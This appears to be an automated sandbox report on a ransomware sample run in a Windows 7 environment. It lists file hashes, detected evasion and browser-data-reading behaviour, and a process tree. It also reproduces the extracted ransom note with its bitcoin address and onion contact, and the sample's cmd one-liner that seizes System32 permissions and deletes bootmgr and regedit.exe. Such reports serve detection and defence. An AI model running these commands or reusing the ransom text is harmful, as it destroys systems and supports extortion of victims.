Analysis

  • max time kernel
    150s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags
    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    06-11-2024 13:55

General

  • Target
    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
  • Size
    3.1MB
  • MD5
    6a85d0ba4d1db63d390b7a071d60e0ef
  • SHA1
    79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
  • SHA256
    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
  • SHA512
    16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
  • SSDEEP
    49152:uZik4UvxXDFSuvXKWC9BKtKkd1UOe65qeVyODIaihosmrcvCM97Wd84T3D:YGuDppmT+Be6bymIhoBcaY6d84jD

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT

Ransom Note

Ooops! All your important files are encrypted!
[+] What happend to my computer? [+]
All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $250.
[+] How do i pay? [+]
Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom.
[+] How can i contact? [+]
1.Download Tor browser (https://www.torproject.org/)
2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/)
3.Write email to us ([email protected])
[+] What if i already paid? [+]
Send your Bitcoin wallet ID to e-mail provided above.
Attention!
1.Do not modify encrypted files.
2.Do not try decrypt your data using third party software.
3.Do not turn off your computer.
Our bitcoin address: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe

URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Renames multiple (202) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 5 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Modifies file permissions 1 TTPs 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
    "C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:576
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1824
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1724
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        PID:2312
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32\drivers /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        PID:2336
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2508

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT
    Filesize
    1KB
    MD5
    f2bbb85d6112bd7360a4ddbc23ea9a8b
    SHA1
    683eb7b2b0a5904337f204f71d25c02b9cc5daba
    SHA256
    be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
    SHA512
    a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172
  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.log
    Filesize
    16B
    MD5
    2caa6f3c95f6ec6bba5b54344938efa0
    SHA1
    2d5637f50e858fbaaeec7853d944dd3c3e91ec39
    SHA256
    16ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
    SHA512
    4141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00
  • C:\Users\Admin\Desktop\ResetBlock.xlsx
    Filesize
    11KB
    MD5
    7c4ebcaeaef5bc92e69c7cbd04600924
    SHA1
    dda30896a3a1f6ce10ac046f236af1495fb93bc9
    SHA256
    218849cd172e02725162943a6821b04b0315d9272d76af9b4a4b6cb58396187f
    SHA512
    1e8ccc10960b52be94de50c19b4e5f2b60b6676b2a3b5a70d11a8bddfae2d6c396fe38fe6daf061768d8c3a72e58c64e07089ae6531e7522791c872707307291

  • memory/576-8-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-19-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-6-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-18-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-17-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-16-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-15-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-14-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-13-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-12-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-11-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-10-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-9-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-0-0x0000000000B00000-0x0000000001330000-memory.dmp
    Filesize
    8.2MB
  • memory/576-1-0x0000000076401000-0x0000000076402000-memory.dmp
    Filesize
    4KB
  • memory/576-20-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-5-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-4-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-3-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-2-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-27-0x0000000000B00000-0x0000000001330000-memory.dmp
    Filesize
    8.2MB
  • memory/576-26-0x0000000000B00000-0x0000000001330000-memory.dmp
    Filesize
    8.2MB
  • memory/576-28-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-21-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-22-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-260-0x0000000000B00000-0x0000000001330000-memory.dmp
    Filesize
    8.2MB
  • memory/576-303-0x0000000076401000-0x0000000076402000-memory.dmp
    Filesize
    4KB
  • memory/576-304-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-305-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB
  • memory/576-7-0x00000000763F0000-0x0000000076500000-memory.dmp
    Filesize
    1.1MB